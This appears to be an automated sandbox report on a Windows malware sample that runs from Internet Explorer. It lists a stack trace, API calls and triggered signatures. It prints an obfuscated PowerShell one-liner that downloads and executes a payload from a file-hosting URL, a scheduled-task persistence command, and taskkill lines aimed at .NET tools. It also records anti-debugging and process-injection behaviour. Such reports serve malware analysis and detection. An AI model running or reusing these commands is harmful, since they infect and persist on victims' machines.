ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff6d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7feff255295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7feff252799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7feff2faf1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7feff2fb76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7feff2548d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff800883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff800ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff800c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff6ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff6cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff80347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff80122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff803542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff6cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff6cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77569bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x775698da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff6cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff7f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff6a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff6a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x772e652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7767c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefdcfa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 99410128
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 99416080
registers.r11: 99411888
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1922348528
registers.r13: 0
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline schtasks /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
cmdline powershell $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cvtres.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RegAsm.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_regbrowsers.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msbuild.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csc.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CasPol.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RegSvcs.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vbc.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_compiler.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_regiis.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "InstallUtil.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "jsc.exe")
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: schtasks
parameters: /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
filepath: schtasks
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im aspnet_compiler.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im RegAsm.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im InstallUtil.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im cvtres.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im vbc.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im msbuild.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im csc.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im CasPol.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im jsc.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im RegAsm.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im RegSvcs.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im aspnet_regiis.exe
filepath: taskkill
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: taskkill
parameters: /f /im aspnet_regbrowsers.exe
filepath: taskkill
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline schtasks /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
cmdline taskkill /f /im aspnet_regbrowsers.exe
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2220 CREDAT:145409
cmdline taskkill /f /im csc.exe
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
cmdline "C:\Windows\System32\taskkill.exe" /f /im csc.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im jsc.exe
cmdline taskkill /f /im InstallUtil.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im InstallUtil.exe
cmdline taskkill /f /im jsc.exe
cmdline taskkill /f /im msbuild.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im cvtres.exe
cmdline taskkill /f /im RegSvcs.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im vbc.exe
cmdline taskkill /f /im aspnet_compiler.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im aspnet_regbrowsers.exe
cmdline taskkill /f /im aspnet_regiis.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im CasPol.exe
cmdline taskkill /f /im CasPol.exe
cmdline taskkill /f /im RegAsm.exe
cmdline taskkill /f /im cvtres.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im msbuild.exe
cmdline taskkill /f /im vbc.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im aspnet_regiis.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im RegSvcs.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im aspnet_compiler.exe
host 117.18.232.200
cmdline schtasks /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
parent_process iexplore.exe martian_process powershell $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
Time & API Arguments Status Return Repeated

send

buffer: tpb…‰m~KˆZ|2§ #ëô—ËKŒÈŒ Qã×cjäN/5 ÀÀÀ À 28/ÿwww.mediafire.com  
socket: 1252
sent: 121
1 121 0

send

buffer: FBAƒ‚~ê±¾oÄÊỏrÒªþŒ‡!P­àªÌ(ßÑ´òÿzÌf¹j×Zu!P˜`Ä'V;ÓÖíî0|óIíZ=uj¹0a®RÜò•}3Z)ÒS 'â¿¿é¬:¾2¸½<2)ï Y¢0€ô^
socket: 1252
sent: 134
1 134 0

send

buffer: €ñ†nžx؉òy±Mçi­Z-ž7š§§.R¸UzÃ5 nh ôd|©†]û¨s°}i#)¼zsL;’=>æNTE¼áÚd8™Hŭljý}»A~7ÛÉ£jX¤é,^·QâØW•:'»£/Pñ$|IÔór^ˤ\LqþÅVß^¡
socket: 1252
sent: 133
1 133 0

send

buffer: }yb…‰t¹ÕOß¹è”ÕÕBÉ¥±_>“P#q¬eh.hÅ/5 ÀÀÀ À 288ÿdownload2273.mediafire.com  
socket: 1760
sent: 130
1 130 0

send

buffer: }yb…‰uñ ¸Â"¡ÆŽÑX¼"bòü‡%³2‘Ó¨’1l/5 ÀÀÀ À 288ÿdownload2273.mediafire.com  
socket: 1760
sent: 130
1 130 0
parent_process iexplore.exe martian_process schtasks /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
parent_process iexplore.exe martian_process taskkill /f /im aspnet_regbrowsers.exe
parent_process iexplore.exe martian_process taskkill /f /im csc.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im csc.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im jsc.exe
parent_process iexplore.exe martian_process taskkill /f /im InstallUtil.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im InstallUtil.exe
parent_process iexplore.exe martian_process taskkill /f /im jsc.exe
parent_process iexplore.exe martian_process taskkill /f /im msbuild.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im cvtres.exe
parent_process iexplore.exe martian_process taskkill /f /im RegSvcs.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im vbc.exe
parent_process iexplore.exe martian_process taskkill /f /im aspnet_compiler.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im aspnet_regbrowsers.exe
parent_process iexplore.exe martian_process powershell $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
parent_process iexplore.exe martian_process taskkill /f /im aspnet_regiis.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im CasPol.exe
parent_process iexplore.exe martian_process taskkill /f /im CasPol.exe
parent_process iexplore.exe martian_process taskkill /f /im RegAsm.exe
parent_process iexplore.exe martian_process taskkill /f /im cvtres.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im msbuild.exe
parent_process iexplore.exe martian_process taskkill /f /im vbc.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im aspnet_regiis.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im RegSvcs.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im aspnet_compiler.exe
Process injection Process 2220 resumed a thread in remote process 2312
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000360
suspend_count: 1
process_identifier: 2312
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe